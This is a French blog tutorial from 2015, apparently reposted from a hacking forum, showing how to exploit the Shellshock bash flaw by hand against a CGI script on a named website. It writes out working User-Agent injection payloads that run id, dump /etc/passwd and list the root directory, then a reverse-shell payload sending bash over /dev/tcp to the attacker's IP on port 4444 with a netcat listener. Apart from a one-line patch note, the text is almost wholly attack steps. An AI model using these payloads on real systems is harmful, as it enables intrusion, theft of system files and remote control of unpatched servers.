jeudi 20 août 2015

Tutoriel Exploitation de la vulnérabilité Shellshock à la main (manuellement)

Suite à notre approche de l'exploitation d'une faille Shellshock via Metasploit, aujourd'hui je vais vous monter la faille shellshock exploitée à la main (personnellement je préfère cette méthode).

Avant de commencer, lisez ce qui suit : http://ift.tt/1Jo67HU


Dans un premier temps je vais rechercher la faille sur ce site :http://site.ch/
Et en cherchant un peu dans ses sources, je remarque une possibilité d'exploitation via le fichier cgi-bin/rpmrepo_scripts/list_rpms.sh


Donc je vais lancer BurpSuite pour capter cette URL , puis je lance le mode repeater pour modifier à la volée les paramètres, mais celui qui m'intéresse est USER-AGENT. Donc si je parviens à injecter du code dans le header, je devrais obtenir les informations passées en argument.

Maintenant on va tester si la faille est bien présente , en modifiant l'USER-AGENT et essayons de faire afficher des données , via une injection de code.Tiens on va demander la version du serveur, avec la commande classique et bien connue: id


Comme on le voit, la modification du header USER-AGENT qui sert pour identifier votre browser web, par un code d'injection () { :;}; echo; echo "jajusa"; /bin/bash "id" va directement nous donner l'identifiant actuel.

Bon c'est sympa, mais si on part du principe que ces données sont visible, on devrait pouvoir lister les répertoires, mais comment?

Simplement en modifiant notre code d'injection ( comprendre les commandes Linux est obligatoire).
Donc, disons ceci:

() { :;}; echo; echo "jajusa"; /bin/bash "id" -> nous donne l'identifiant
Donc si on modifie le /bin/bash par un simple /bin/cat par exemple, je devrai pouvoir lire les fichiers.
Testons sur le célèbre fichier /etc/passwd
Donc on modifie le code par () { :;}; echo; echo "jajusa"; /bin/cat /etc/passwd


Voilà c'est très simple , non?
Bon je vais finir pour un listing complet depuis la racine.
Donc le code d'injection ici fonctionnera avec la commande ls
() { :;}; echo; echo "jajusa"; /bin/ls -lah / ici ls -lah pour voir les permissions puis / pour indiquer la racine du serveur.



Bon maintenant allons un peu plus loin que l'injection de code dans l'entête USER-AGENT, et on va se renvoyé une petite connexion via le port 4444.

Donc ce faire, il nous faut 3 choses:
-Le port 4444 ouvert sur notre box
-Une ip DNS (noip par exemple), non obligatoire
-Et un code pour nous renvoyé la connexion.
Dont voici le code d'injection:
() { :;}; /bin/bash -c "bash -i >& /dev/tcp/Votre_IP ou Votre_Ip_DNS/4444 0>&1"

Voilà ensuite on va mettre lancer une écoute sur le port 4444 avec netcat: nc -lp 4444 -vv

Correctif: un simple apt-get update, devrait corriger cette vulnérabilité.

Voilà ,j'espère que ce tutoriel vous as plu.

Prochain chapitre : Shellshock via le protocole smtp Qmail.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Nnt8vd
via IFTTT

Aucun commentaire:

Enregistrer un commentaire